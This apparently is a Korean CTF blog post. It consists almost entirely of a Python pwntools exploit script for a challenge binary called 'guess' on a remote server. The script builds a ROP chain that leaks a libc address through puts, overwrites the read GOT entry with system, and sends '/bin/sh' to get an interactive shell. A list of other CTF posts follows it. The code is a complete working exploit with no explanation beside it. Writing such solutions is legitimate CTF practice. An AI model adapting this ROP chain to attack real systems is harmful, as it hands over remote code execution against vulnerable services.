728x90
from pwn import *
import os

rand_value = int(os.urandom(4).encode('hex'), 16) % 500

#s = process("./guess")
s = remote("pwnable.shop",10003)
libc = ELF("./libc")
elf = ELF("./guess")

pop_rsi_r15 = 0x00400761
pop_rdi = 0x00400763

s.recvuntil("Input String!")

pay = p64(0x00400778)*65
pay += p64(0x00400763)
pay += p64(elf.got['puts'])
pay += p64(elf.plt['puts'])

pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.bss()+0x10)
pay += p64(0)
pay += p64(elf.plt['read'])

pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.got['read'])
pay += p64(0)
pay += p64(elf.plt['read'])

pay += p64(pop_rdi)
pay += p64(elf.bss()+0x10)
pay += p64(elf.plt['read'])

s.send(pay)

print s.recvline()
leak = u64(s.recv(6)+'\x00\x00')
print "leak : " + hex(leak)
libc_base = leak - libc.symbols['puts']
one_shot = leak = libc_base + 0xf1147
print "libc_base : " + hex(libc_base)
print "one_shot : " + hex(one_shot)
system = libc_base + libc.symbols['system']

s.send("/bin/sh\x00")

s.send(p64(system))

s.interactive()


'PWN > CTF' 카테고리의 다른 글

[WITHCON 2016] malloc  (0) 2019.02.26
[Hackingcamp 19] ucanfind  (0) 2019.02.20
[Hackingcamp 19] Orange  (0) 2019.02.20
[Hackingcamp 19] sms_service  (0) 2019.02.20
[Asis 2015] math sequence  (0) 2019.02.15